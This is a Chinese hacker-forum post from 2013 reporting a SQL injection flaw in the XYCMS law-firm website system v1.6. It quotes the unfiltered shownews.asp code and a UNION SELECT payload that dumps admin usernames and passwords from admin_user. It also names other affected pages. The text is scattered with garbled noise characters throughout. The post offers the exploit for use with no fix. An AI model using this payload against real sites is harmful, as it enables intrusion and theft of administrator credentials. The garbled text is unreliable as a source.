前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似, F9 d! e; x) B/ Z
9 O q8 ?! V: W4 @, }7 ?淫荡分割线% v. T5 L7 ~) D: ^! c$ G
--------------------------------------------------------3 z: S7 E8 \1 ?& u. j) K6 u
3 }: h$ a+ Y7 p7 s. x5 y
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
: b l8 ^2 x2 x) B2 u源码地址:http://down.chinaz.com/soft/29233.htm2 i: A, |# y* M
0 B9 e/ v; P0 D( l3 `, F漏洞文件:shownews.asp* \& r1 T3 T, o
漏洞代码:7-13行
I' l* ~0 I% z: \$ _& N9 H- P
* P- _$ {0 E- D0 j. @) r; [ 2 ?9 o5 C6 o+ H- m' g* ^
<% \ Z5 C$ i% D/ V- N* k
id=request.QueryString("id")8 y6 r% u+ Z: X$ ]
! V3 W& c% w& w4 A2 N4 {+ q4 u5 ^set snews=server.createobject("adodb.recordset") 9 s4 s4 D% f8 c( F3 a1 B3 i" s4 f
exec="select * from [news] where id="&id
4 `4 d. {6 s" k+ H% G7 Qsnews.open exec,conn,1,1: P6 N; G, l$ I0 i+ A
%>
1 |# s6 F. v! e1 q8 K% U1 f ( m# D* q" @; `8 n! P# \$ f
6 }+ o* S+ Z4 `5 e; B+ _什么过滤都没有 直造成注入" V: v9 q: Z4 B7 t
6 c& r0 U! g Z) [# j
注入点:http://127.0.0.1:99/shownews.asp?id=xx3 n1 T! M) F3 E& { G- O6 R/ w
2 B$ G: Y w* F( Z2 A1 h其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
4 b5 s9 l9 ^- h# D$ s6 p" w# b1 @
+ @4 Y* _ o* }( Z- k* D* h 9 ^4 y( P4 P, ]/ y7 q: D+ W
exp: union select 1,admin,password,4,5,7 from admin_user
0 U# u" S" e2 c, j0 b5 e1 c* Z. I; N+ s! S1 T
|
发表于 2013-4-4 17:28:12
收藏
支持
反对